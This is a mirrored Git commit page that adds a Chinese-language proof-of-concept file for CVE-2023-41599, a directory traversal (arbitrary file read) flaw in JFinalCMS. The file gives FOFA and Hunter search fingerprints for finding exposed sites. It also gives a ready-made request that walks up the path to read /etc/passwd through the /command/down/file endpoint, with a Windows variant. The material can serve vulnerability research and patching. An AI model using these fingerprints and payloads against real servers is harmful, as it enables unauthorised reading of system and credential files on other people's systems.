admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md

Browse Source
This commit is contained in:
wy876 2023-09-20 17:48:03 +08:00 committed by GitHub
parent b26e0d9c39
commit 0561f20ed5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
JFinalCMS 任意文件读取漏洞(CVE-2023-41599).md Normal file
View File

@ -0,0 +1,23 @@
## JFinalCMS 任意文件读取漏洞(CVE-2023-41599)
## 特征
```fofa:
body="content=\"JreCms"
hunter:
web.body="content=\"JreCms"
```
## POC
```
Windows: /../../../../../../../../../test.txt
Linux: /../../../../../../../../../etc/passwd
/command/down/file?filekey=/../../../../../../../../../etc/passwd
```
## 漏洞分析
http://www.so1lupus.ltd/2023/08/28/Directory-traversal-in-JFinalCMS/